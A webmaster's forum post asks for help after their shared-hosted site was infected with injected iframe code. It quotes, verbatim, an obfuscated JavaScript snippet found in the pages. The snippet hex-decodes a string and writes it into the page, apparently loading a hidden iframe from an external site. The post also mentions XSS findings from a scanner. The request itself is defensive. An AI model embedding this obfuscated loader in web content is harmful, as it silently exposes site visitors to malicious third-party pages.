Hi
It seems our site (on a shared host) has been infected with iframe virus
Lots of our html / php files had iframe code added - pointing to 2 external dodgy looking websites
(I have removed most of the code manually and / or copied over with a clean backup)
At the moment when we try to upload index.htm or index.html
the files are removed immediately from the FTP server so homepage doesn't load!
Please check out our site:
hxxp://www.visualiminals.com (HOMEPAGE NOT WORKING as mentioned above)
so please try
hxxp://www.visualiminals.com/products/genius.htm
I also found this script which looks suspicious
<script>function c3257948b3q49f1af131e067(q49f1af131e44d){ function q49f1af131e835(){var q49f1af131ec1c=16;return q49f1af131ec1c;} return (eval('pa'+'rseInt')(q49f1af131e44d,q49f1af131e835()));}function q49f1af131f005(q49f1af131f3ec){ var q49f1af131f7d8='';q49f1af1320773=String['fromCharCode'];for(q49f1af131fbea=0;q49f1af131fbea<q49f1af131f3ec.length;q49f1af131fbea+=2){ q49f1af131f7d8+=(q49f1af1320773(c3257948b3q49f1af131e067(q49f1af131f3ec.substr(q49f1af131fbea,2))));}return q49f1af131f7d8;} var vf1='';var q49f1af1320b5b='3C7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E696628216D7'+vf1+'96961297'+vf1+'B646F637'+vf1+'56D656E7'+vf1+'42E7'+vf1+'7'+vf1+'7'+vf1+'2697'+vf1+'465287'+vf1+'56E657'+vf1+'363617'+vf1+'065282027'+vf1+'2533632536392536362537'+vf1+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+vf1+'332537'+vf1+'32253633253364253237'+vf1+'2536382537'+vf1+'342537'+vf1+'342537'+vf1+'302533612532662532662537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2532652536322537'+vf1+'322536662536652536662537'+vf1+'342536312536622532652536332536652532662537'+vf1+'302536382537'+vf1+'302536642537'+vf1+'392536312536342536642536392536652532662536392536652536342536352537'+vf1+'382532652537'+vf1+'302536382537'+vf1+'30253366253237'+vf1+'2532622534642536312537'+vf1+'342536382532652537'+vf1+'322536662537'+vf1+'352536652536342532382534642536312537'+vf1+'342536382532652537'+vf1+'32253631253665253634253666253664253238253239253261253331253330253330253332253333253330253239253262253237'+vf1+'253330253333253237'+vf1+'2532302537'+vf1+'37'+vf1+'2536392536342537'+vf1+'34253638253364253337'+vf1+'253337'+vf1+'253331253230253638253635253639253637'+vf1+'2536382537'+vf1+'342533642533312533332533302532302537'+vf1+'332537'+vf1+'342537'+vf1+'39253663253635253364253237'+vf1+'2537'+vf1+'362536392537'+vf1+'332536392536322536392536632536392537'+vf1+'342537'+vf1+'39253361253638253639253634253634253635253665253237'+vf1+'2533652533632532662536392536362537'+vf1+'3225363125366425363525336527'+vf1+'29293B7'+vf1+'D7'+vf1+'6617'+vf1+'2206D7'+vf1+'969613D7'+vf1+'47'+vf1+'27'+vf1+'5653B3C2F7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E';q49f1af132132c=document;q49f1af132132c.write(q49f1af131f005(q49f1af1320b5b));</script>
We used McAfee secure which found 2 possible vulnerabilities:
1) Cross site scripting vulnerability in recommend a friend popup script
2) website stats script
I have contacted our host already but any tips to remove the threats and secure the site would be great!
Thank you in advance